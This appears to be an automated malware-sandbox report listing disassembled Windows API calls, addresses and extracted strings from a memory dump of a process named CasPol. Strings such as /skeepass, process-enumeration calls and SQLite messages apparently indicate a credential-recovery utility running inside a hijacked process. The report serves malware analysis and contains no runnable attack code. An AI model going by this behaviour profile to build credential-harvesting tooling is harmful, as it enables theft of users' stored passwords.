                                                                                                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1010922700-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                  • free.MSVCRT ref: 004186C7
                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                  • free.MSVCRT ref: 004186E0
                                                                                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                  • free.MSVCRT ref: 00418716
                                                                                                                                                                                  • free.MSVCRT ref: 0041872A
                                                                                                                                                                                  • free.MSVCRT ref: 00418749
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                  • API String ID: 3356672799-1717621600
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                  • API String ID: 2012295524-70141382
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1700100422-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 552707033-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                                                                                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                  • String ID: 4$h
                                                                                                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                                  • String ID: %%0.%df
                                                                                                                                                                                  • API String ID: 3473751417-763548558
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                  • String ID: caption
                                                                                                                                                                                  • API String ID: 973020956-4135340389
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                  • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                  • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                  • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                  • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy
                                                                                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                  • API String ID: 1284135714-318151290
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 290601579-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                  • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                  • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                  • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                  • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memchrmemset
                                                                                                                                                                                  • String ID: PD$PD
                                                                                                                                                                                  • API String ID: 1581201632-2312785699
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                  • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2163313125-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$wcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3592753638-3916222277
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                  • String ID: %s (%s)$YV@
                                                                                                                                                                                  • API String ID: 3979103747-598926743
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                  • API String ID: 2767993716-572158859
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                  • out of memory, xrefs: 0042F865
                                                                                                                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                  • database is already attached, xrefs: 0042F721
                                                                                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
